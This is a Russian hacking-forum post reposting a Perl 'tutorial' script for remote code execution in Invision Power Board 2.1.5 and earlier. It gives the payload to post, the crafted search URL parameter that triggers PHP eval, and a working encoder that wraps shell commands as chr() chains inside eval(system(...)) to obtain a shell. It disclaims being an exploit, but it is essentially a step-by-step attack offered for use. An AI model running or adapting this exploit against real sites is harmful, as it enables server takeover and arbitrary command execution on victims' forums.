26.10.2008, 19:24
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Invision Power Board <= 2.1.5 Remote Code Execution Tutorial
Автор: +toxa+
Invision Power Board <= 2.1.5
Remote Code Execution
PHP код:
#!usr/bin/perl
## Invision Power Board <= 2.1.5 Remote Code Execution Tutorial
## By not null
## Security Bunker Team
## http://secbun.info
## It is not an exploit! It is only tutorial, how to exploit a forum!
print q(
#-----------------------------------------#
# Invision Power Board 2.x.x RCE Tutorial #
# By Security Bunker Team | ©not null #
# http://www.secbun.info #
#-----------------------------------------# );
print q(
Step 1: If you are already register on the forum, just login on it.
Else register first ;]);
print "\r\nPress enter when finished...\r\n";
$ok = <STDIN>;
print q(
Ok, we have successful log in. Let's fun ;]
Step 2: Go to some of the forum, where you could post messages.
Step 3: Post a message, that consist our harmful code (muahaha)
The code is: "eval(phpinfo()); //" [without quotes]
);
print "\r\nPress enter when finished...\r\n";
$ok = <STDIN>;
print q(When message is post, open a new page in your browser and go to the Search
(index.php?act=search). Use the search form to find your post just by your username.
And make sure "Show results as posts" is selected.);
print "\r\nPress enter when finished...\r\n";
$ok = <STDIN>;
print q(You must see your post, that consist our code.
Then add to the end of the url next string:);
print "\r\n&lastdate=z|eval.*?%20//)%23e%00\r\n";
print q(and press enter...);
print "\r\nPress enter when finished...\r\n";
$ok = <STDIN>;
print q(Can you see a result of phpinfo? If yes, we have successful exploited forum :-]
So, let's modify our post to get a shell.
But on this step we have a problem: we can't use arguments in functions (e.g. system("ls")) in such form.
But we can use it by it's code (e.g. system(chr(34).chr(108).chr(115).chr(34)))
I'm include a simple tool, that will help you to encode you string into code.
Just type your command, and you will get a string, that you can copy and paste into your post);
print "\r\n";
$out = "";
while ()
{
print "\r\nCommand for encode or 'exit' for exit ";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);
exit() if ($cmd eq 'exit);
last;
}
$len = length($cmd);
for ($i=0; $i<$len; $i++)
{
$s = substr($cmd,$i,1);
$out.="chr(".ord($s).")";
if($i != $len-1)
{
$out.=".";
}
}
print "eval(system(".$out.").chr(59).exit()); //";
$out = "";
}
PS Материал востановлен
Дата публикации: 15.08.2007, 14:58
Автор +toxa+
|
|
|